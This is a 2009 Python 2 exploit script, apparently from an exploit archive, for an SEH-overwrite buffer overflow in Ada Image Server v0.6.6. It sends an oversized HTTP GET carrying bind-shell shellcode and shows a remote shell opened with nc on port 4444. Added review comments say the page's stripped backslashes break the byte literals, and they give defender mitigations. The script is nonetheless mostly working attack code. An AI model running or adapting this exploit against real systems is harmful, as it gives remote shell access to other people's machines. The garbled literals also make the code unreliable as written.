
imgsrv.py.txt

Posted on 08 October 2009

#!/usr/bin/python
# Only usable module with safeseh disabled on XP SP2 and XP SP3 is imgsrv.exe.
# However, it contains a null character in the address (ex: XP SP3 => 00689aff).
# Versions above 0.6.7 do not seem to be vulnerable.
#
# $ ./imgsrv.py 192.168.1.146
#
# [*] Ada Image Server v0.6.6 SEH Overwrite
# [*] Discovered/Exploited by Blake
# [*] Tested on XP SP1
#
# [+] Connecting to 192.168.1.146
# [+] Sending payload
# [+] Payload Sent
#
# $ nc 192.168.1.146 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Program FilesImgsvr>
#
# NOTE(review): historical (2009) proof-of-concept written in Python 2
# syntax (print statements, str-based socket I/O).  As reproduced on this
# page every backslash has been stripped, so "x41", "x90", "xe9x44..." and
# the shellcode lines are plain ASCII text, not the bytes the author's
# comments describe; the byte counts quoted below (696, 19734, -700, -7)
# therefore do not match the literals as written.  Read the script as a
# description of the issue, not as a faithful copy of the original.
#
# Defender's summary, as far as this file shows it: a single oversized HTTP
# GET (a request line of at least 19000 characters from `payload` alone) is
# sent to TCP/1235, and the author's comments describe the overflow as
# overwriting a Structured Exception Handler record.  The author's own
# header states the technique depends on a module without SafeSEH and that
# versions above 0.6.7 are not affected, so the remediation on the service
# side is upgrading; SafeSEH/SEHOP and DEP on later Windows builds are the
# generic mitigations for this handler-overwrite class.  A request line
# that long is also straightforward to reject in the service's own input
# handling or to alert on at an IDS.

import socket, sys

print " [*] Ada Image Server v0.6.6 SEH Overwrite"
print "[*] Discovered/Exploited by Blake"
print "[*] Tested on XP SP1 "

# Exactly one positional argument (the target host) is expected; anything
# else prints usage.  The exit status is 0 even on misuse.
if len(sys.argv)!= 2:
    print "[*] Usage: %s <ip> " % sys.argv[0]
    sys.exit(0)

host = sys.argv[1]
port = 1235 # default port  (hard-coded; not overridable from the command line)

# windows/shell_bind_tcp - 696 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
# (Author's description of the payload.  The 696-byte figure refers to the
# author's escape-encoded literal, not to the de-escaped text reproduced
# below, which the page shows without its backslashes.)
shellcode = (
"x89xe1xdaxd5xd9x71xf4x5ex56x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx43x5ax4ax4bx50x4dx4dx38x4cx39x4bx4fx4b"
"x4fx4bx4fx43x50x4cx4bx42x4cx51x34x47x54x4cx4b"
"x51x55x47x4cx4cx4bx43x4cx44x45x42x58x45x51x4a"
"x4fx4cx4bx50x4fx45x48x4cx4bx51x4fx47x50x43x31"
"x4ax4bx47x39x4cx4bx47x44x4cx4bx43x31x4ax4ex46"
"x51x49x50x4dx49x4ex4cx4dx54x49x50x43x44x44x47"
"x49x51x48x4ax44x4dx43x31x48x42x4ax4bx4cx34x47"
"x4bx51x44x47x54x47x58x44x35x4ax45x4cx4bx51x4f"
"x51x34x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4b"
"x4dx59x42x4cx46x44x45x4cx45x31x48x43x50x31x49"
"x4bx43x54x4cx4bx50x43x46x50x4cx4bx47x30x44x4c"
"x4cx4bx42x50x45x4cx4ex4dx4cx4bx47x30x43x38x51"
"x4ex42x48x4cx4ex50x4ex44x4ex4ax4cx50x50x4bx4f"
"x4ex36x45x36x50x53x43x56x43x58x46x53x46x52x45"
"x38x42x57x43x43x46x52x51x4fx51x44x4bx4fx48x50"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx48"
"x56x51x4fx4cx49x4dx35x45x36x4bx31x4ax4dx44x48"
"x43x32x50x55x42x4ax43x32x4bx4fx4ex30x45x38x48"
"x59x43x39x4ax55x4ex4dx46x37x4bx4fx4ex36x51x43"
"x51x43x51x43x51x43x51x43x51x53x51x43x50x43x50"
"x53x4bx4fx48x50x45x36x43x58x42x31x51x4cx45x36"
"x51x43x4dx59x4dx31x4ax35x43x58x4ex44x45x4ax44"
"x30x48x47x46x37x4bx4fx49x46x42x4ax42x30x46x31"
"x50x55x4bx4fx48x50x42x48x49x34x4ex4dx46x4ex4d"
"x39x46x37x4bx4fx4ex36x46x33x50x55x4bx4fx48x50"
"x43x58x4bx55x50x49x4cx46x50x49x46x37x4bx4fx4e"
"x36x50x50x51x44x50x54x50x55x4bx4fx48x50x4ax33"
"x42x48x4bx57x44x39x48x46x44x39x51x47x4bx4fx49"
"x46x46x35x4bx4fx48x50x45x36x42x4ax43x54x43x56"
"x42x48x42x43x42x4dx4bx39x4bx55x42x4ax50x50x50"
"x59x51x39x48x4cx4cx49x4ax47x43x5ax47x34x4bx39"
"x4ax42x46x51x49x50x4cx33x4ex4ax4bx4ex47x32x46"
"x4dx4bx4ex47x32x46x4cx4dx43x4cx4dx42x5ax50x38"
"x4ex4bx4ex4bx4ex4bx45x38x43x42x4bx4ex4ex53x44"
"x56x4bx4fx42x55x47x34x4bx4fx4ex36x51x4bx50x57"
"x51x42x50x51x50x51x50x51x42x4ax45x51x50x51x50"
"x51x50x55x50x51x4bx4fx4ex30x42x48x4ex4dx4ex39"
"x44x45x48x4ex46x33x4bx4fx49x46x43x5ax4bx4fx4b"
"x4fx46x57x4bx4fx48x50x4cx4bx50x57x4bx4cx4bx33"
"x49x54x42x44x4bx4fx49x46x50x52x4bx4fx48x50x43"
"x58x4cx30x4cx4ax43x34x51x4fx51x43x4bx4fx48x56"
"x4bx4fx4ex30x41x41")

# Pieces of the request path, in the order they are concatenated in the
# send() call below.  The trailing comments and sizes are the author's and
# describe the escaped originals, not the de-escaped text on this page.
payload = "x41" * 19000 # overwrites seh handler at 19734
nops = "x90" * 29 # nop sled
sc = shellcode # shellcode - 696 bytes
near_jmp = "xe9x44xfdxffxff" # jump back -700 bytes
next_seh = "xebxf9xffxff" # jump back -7 bytes
seh = "x10xbfxc1x77" # c:windowssystem32msvcrt.dll  (author's note: address from a module without SafeSEH, cf. header)
junk = "x43" * 262 # junk buffer

print "[+] Connecting to %s" % host
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((host,port))
except:
    # Bare except: this also swallows KeyboardInterrupt and SystemExit, the
    # socket object is never closed on this path, and the exit status is 0
    # despite the failure.  socket.error is the narrow clause for a failed
    # connect().
    print "[x] Could not connect! "
    sys.exit(0)
print "[+] Sending payload"
# The whole request goes out in one send(); its return value (bytes actually
# queued) is not checked.  The request line as written ends in " HTTP/1.0 "
# with no line terminator visible on this page.
s.send("GET /" + payload + nops + sc + near_jmp + next_seh + seh + junk + " HTTP/1.0 ")
s.close()
print "[+] Payload Sent "

 
